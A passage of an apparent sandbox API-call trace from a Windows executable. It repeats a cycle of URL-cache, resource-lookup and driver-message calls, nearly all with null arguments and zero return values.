RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.914] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.914] GetUserDefaultLangID () returned 0x409 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.914] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.914] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.914] GetUserDefaultLangID () returned 0x409 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.914] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.914] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.914] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.914] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.914] GetUserDefaultLangID () returned 0x409 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.914] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.915] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.915] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.915] GetUserDefaultLangID () returned 0x409 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.915] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.915] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.915] GetUserDefaultLangID () returned 0x409 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.915] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.915] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.915] GetUserDefaultLangID () returned 0x409 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.915] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.915] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.915] GetUserDefaultLangID () returned 0x409 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.915] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.915] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.915] GetUserDefaultLangID () returned 0x409 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.915] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.915] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.915] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.915] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.915] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.915] GetUserDefaultLangID () returned 0x409 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.916] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.916] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.916] GetUserDefaultLangID () returned 0x409 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.916] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.916] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.916] GetUserDefaultLangID () returned 0x409 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.916] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.916] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.916] GetUserDefaultLangID () returned 0x409 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.916] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.916] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.916] GetUserDefaultLangID () returned 0x409 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.916] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.916] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.916] GetUserDefaultLangID () returned 0x409 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.916] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.916] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.916] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.916] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.916] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.917] GetUserDefaultLangID () returned 0x409 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.917] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.917] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.917] GetUserDefaultLangID () returned 0x409 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.917] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.917] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.917] GetUserDefaultLangID () returned 0x409 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.917] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.917] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.917] GetUserDefaultLangID () returned 0x409 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.917] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.917] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.917] GetUserDefaultLangID () returned 0x409 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.917] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.917] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.917] GetUserDefaultLangID () returned 0x409 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.917] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.917] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.917] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.917] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.918] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.918] GetUserDefaultLangID () returned 0x409 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.918] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.918] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.918] GetUserDefaultLangID () returned 0x409 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.918] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.918] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.918] GetUserDefaultLangID () returned 0x409 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.918] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.918] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.918] GetUserDefaultLangID () returned 0x409 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.918] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.918] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.918] GetUserDefaultLangID () returned 0x409 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.918] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.918] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.918] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.918] GetUserDefaultLangID () returned 0x409 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.918] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.918] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.918] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryStreamA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, fRandomRead=0, dwReserved=0x0 | out: lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0) returned 0x0 [0185.919] SendDriverMessage (hDriver=0x0, message=0x500a, lParam1=0x0, lParam2=0x0) returned 0x0 [0185.919] GetUserDefaultLangID () returned 0x409 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x409) returned 0x0 [0185.919] FindResourceExW (hModule=0x400000, lpType="\xe718\x19\xe494\x19\x600", lpName="", wLanguage=0x400) returned 0x0 [0185.919] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0185.919] ResumeSuspendedDownload (hRequest=0x0, dwResultCode=0x0) returned 0 [0185.919] RetrieveUrlCacheEntryFileA (in: lpszUrlName=0x0, lpCacheEntryInfo=0x0, lpcbCacheEntryInfo=0x0, dwReserved=0x0 | out: 